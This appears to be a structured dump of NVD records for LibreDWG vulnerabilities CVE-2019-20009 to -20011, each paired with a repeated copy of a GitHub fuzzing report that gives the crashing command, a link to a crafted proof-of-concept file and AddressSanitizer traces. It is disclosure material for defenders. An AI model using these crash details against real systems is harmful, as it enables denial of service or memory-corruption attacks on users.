0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # #
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/176/comments
24
2019-12-24T03:44:32Z
2020-01-16T12:12:03Z
https://github.com/LibreDWG/libredwg/issues/176
541,977,765
176
CVE-2019-20009
2019-12-27T01:15:13.257
An issue was discovered in GNU LibreDWG before 0.93. Crafted input will lead to an attempted excessive memory allocation in dwg_decode_SPLINE_private in dwg.spec.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00033.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00045.html" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/compare/0.9.2...0.9.3" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176#issue-541977765" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "09B5D2C4-D4B2-4226-AA34-A346E6064FA2", "versionEndExcluding": "0.9.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/176#issue-541977765
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # #
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/176/comments
24
2019-12-24T03:44:32Z
2020-01-16T12:12:03Z
https://github.com/LibreDWG/libredwg/issues/176
541,977,765
176
CVE-2019-20010
2019-12-27T01:15:13.320
An issue was discovered in GNU LibreDWG 0.92. There is a use-after-free in resolve_objectref_vector in decode.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00033.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00045.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643383" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6967607-F26E-477A-8D60-8B0D55594EC9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643383
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # #
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/176/comments
24
2019-12-24T03:44:32Z
2020-01-16T12:12:03Z
https://github.com/LibreDWG/libredwg/issues/176
541,977,765
176
CVE-2019-20011
2019-12-27T01:15:13.383
An issue was discovered in GNU LibreDWG 0.92. There is a heap-based buffer over-read in decode_R13_R2000 in decode.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00033.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00045.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643439" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6967607-F26E-477A-8D60-8B0D55594EC9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643439
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 